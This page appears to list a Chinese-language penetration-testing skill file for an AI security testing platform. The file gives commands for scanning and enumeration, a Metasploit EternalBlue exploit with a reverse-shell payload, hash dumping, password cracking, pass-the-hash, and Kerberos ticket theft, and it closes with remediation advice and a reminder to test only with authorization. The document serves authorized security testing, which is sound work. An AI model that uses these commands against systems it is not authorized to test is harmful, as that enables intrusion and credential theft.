Back to list
Ed1s0nZ

network-penetration-testing

by Ed1s0nZ

CyberStrikeAI is an AI-native security testing platform built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, and comprehensive lifecycle management capabilities.

564🍴 90📅 Jan 23, 2026

SKILL.md


name: network-penetration-testing description: 网络渗透测试的专业技能和方法论 version: 1.0.0

网络渗透测试

概述

网络渗透测试是评估网络基础设施安全性的重要环节。本技能提供网络渗透测试的方法、工具和最佳实践。

测试范围

1. 信息收集

检查项目:

  • 网络拓扑
  • 主机发现
  • 端口扫描
  • 服务识别

2. 漏洞扫描

检查项目:

  • 系统漏洞
  • 服务漏洞
  • 配置错误
  • 弱密码

3. 漏洞利用

检查项目:

  • 远程代码执行
  • 权限提升
  • 横向移动
  • 持久化

信息收集

网络扫描

使用Nmap:

# 主机发现
nmap -sn 192.168.1.0/24

# 端口扫描
nmap -sS -p- 192.168.1.100

# 服务识别
nmap -sV -sC 192.168.1.100

# 操作系统识别
nmap -O 192.168.1.100

# 完整扫描
nmap -sS -sV -sC -O -p- 192.168.1.100

使用Masscan:

# 快速端口扫描
masscan -p1-65535 192.168.1.0/24 --rate=1000

服务枚举

SMB枚举:

# 枚举SMB共享
smbclient -L //192.168.1.100 -N

# 枚举SMB用户
enum4linux -U 192.168.1.100

# 使用nmap脚本
nmap --script smb-enum-shares,smb-enum-users 192.168.1.100

RPC枚举:

# 枚举RPC服务
rpcclient -U "" -N 192.168.1.100

# 使用nmap脚本
nmap --script rpc-enum 192.168.1.100

SNMP枚举:

# SNMP扫描
snmpwalk -v2c -c public 192.168.1.100

# 使用onesixtyone
onesixtyone -c wordlist.txt 192.168.1.0/24

漏洞扫描

使用Nessus

# 启动Nessus
# 访问Web界面
# 创建扫描任务
# 分析扫描结果

使用OpenVAS

# 启动OpenVAS
gvm-setup

# 访问Web界面
# 创建扫描任务
# 分析扫描结果

使用Nmap脚本

# 漏洞扫描
nmap --script vuln 192.168.1.100

# 特定漏洞扫描
nmap --script smb-vuln-ms17-010 192.168.1.100

# 所有脚本
nmap --script all 192.168.1.100

漏洞利用

Metasploit

基础使用:

# 启动Metasploit
msfconsole

# 搜索漏洞
search ms17-010

# 使用模块
use exploit/windows/smb/ms17_010_eternalblue

# 设置参数
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

# 执行
exploit

后渗透:

# 获取系统信息
sysinfo

# 获取权限
getsystem

# 迁移进程
migrate <pid>

# 获取哈希
hashdump

# 获取密码
run post/windows/gather/smart_hashdump

常见漏洞利用

EternalBlue:

# 使用Metasploit
use exploit/windows/smb/ms17_010_eternalblue

# 使用独立工具
python eternalblue.py 192.168.1.100

BlueKeep:

# 使用Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

SMBGhost:

# 使用独立工具
python smbghost.py 192.168.1.100

横向移动

密码破解

使用Hashcat:

# 破解NTLM哈希
hashcat -m 1000 hashes.txt wordlist.txt

# 破解LM哈希
hashcat -m 3000 hashes.txt wordlist.txt

# 使用规则
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule

使用John:

# 破解哈希
john hashes.txt

# 使用字典
john --wordlist=wordlist.txt hashes.txt

# 使用规则
john --wordlist=wordlist.txt --rules hashes.txt

Pass-the-Hash

使用Impacket:

# SMB Pass-the-Hash
python smbexec.py -hashes :<hash> domain/user@target

# WMI Pass-the-Hash
python wmiexec.py -hashes :<hash> domain/user@target

# RDP Pass-the-Hash
xfreerdp /u:user /pth:<hash> /v:target

票据传递

使用Mimikatz:

# 提取票据
sekurlsa::tickets /export

# 注入票据
kerberos::ptt ticket.kirbi

使用Rubeus:

# 请求票据
Rubeus.exe asktgt /user:user /domain:domain /rc4:hash

# 注入票据
Rubeus.exe ptt /ticket:ticket.kirbi

工具使用

Nmap

# 完整扫描
nmap -sS -sV -sC -O -p- -T4 target

# 隐蔽扫描
nmap -sS -T2 -f -D RND:10 target

# UDP扫描
nmap -sU -p- target

Metasploit

# 启动框架
msfconsole

# 数据库初始化
msfdb init

# 导入扫描结果
db_import nmap.xml

# 查看主机
hosts

# 查看服务
services

Burp Suite

网络扫描:

  1. 配置代理
  2. 浏览目标网络
  3. 分析流量
  4. 主动扫描

测试清单

信息收集

  • 网络拓扑发现
  • 主机发现
  • 端口扫描
  • 服务识别
  • 操作系统识别

漏洞扫描

  • 系统漏洞扫描
  • 服务漏洞扫描
  • 配置错误检查
  • 弱密码检查

漏洞利用

  • 远程代码执行
  • 权限提升
  • 横向移动
  • 持久化

常见安全问题

1. 未打补丁的系统

问题:

  • 系统未及时更新
  • 存在已知漏洞
  • 补丁管理不当

修复:

  • 及时安装补丁
  • 建立补丁管理流程
  • 定期安全更新

2. 弱密码

问题:

  • 默认密码
  • 简单密码
  • 密码重用

修复:

  • 实施强密码策略
  • 启用多因素认证
  • 定期更换密码

3. 开放端口

问题:

  • 不必要的端口开放
  • 服务暴露
  • 防火墙配置错误

修复:

  • 关闭不必要端口
  • 实施防火墙规则
  • 使用VPN访问

4. 配置错误

问题:

  • 默认配置
  • 权限过大
  • 服务配置不当

修复:

  • 安全配置基线
  • 最小权限原则
  • 定期配置审查

最佳实践

1. 信息收集

  • 全面扫描
  • 多工具验证
  • 记录发现
  • 分析结果

2. 漏洞利用

  • 授权测试
  • 最小影响
  • 记录操作
  • 及时清理

3. 报告编写

  • 详细记录
  • 风险评级
  • 修复建议
  • 验证步骤

注意事项

  • 仅在授权环境中进行测试
  • 避免对生产系统造成影响
  • 遵守法律法规
  • 保护测试数据

Score

Total Score

80/100

Based on repository quality metrics

SKILL.md

SKILL.mdファイルが含まれている

+20
LICENSE

ライセンスが設定されている

0/10
説明文

100文字以上の説明がある

+10
人気

GitHub Stars 500以上

+10
最近の活動

1ヶ月以内に更新

+10
フォーク

10回以上フォークされている

+5
Issue管理

オープンIssueが50未満

+5
言語

プログラミング言語が設定されている

+5
タグ

1つ以上のタグが設定されている

+5

Reviews

💬

Reviews coming soon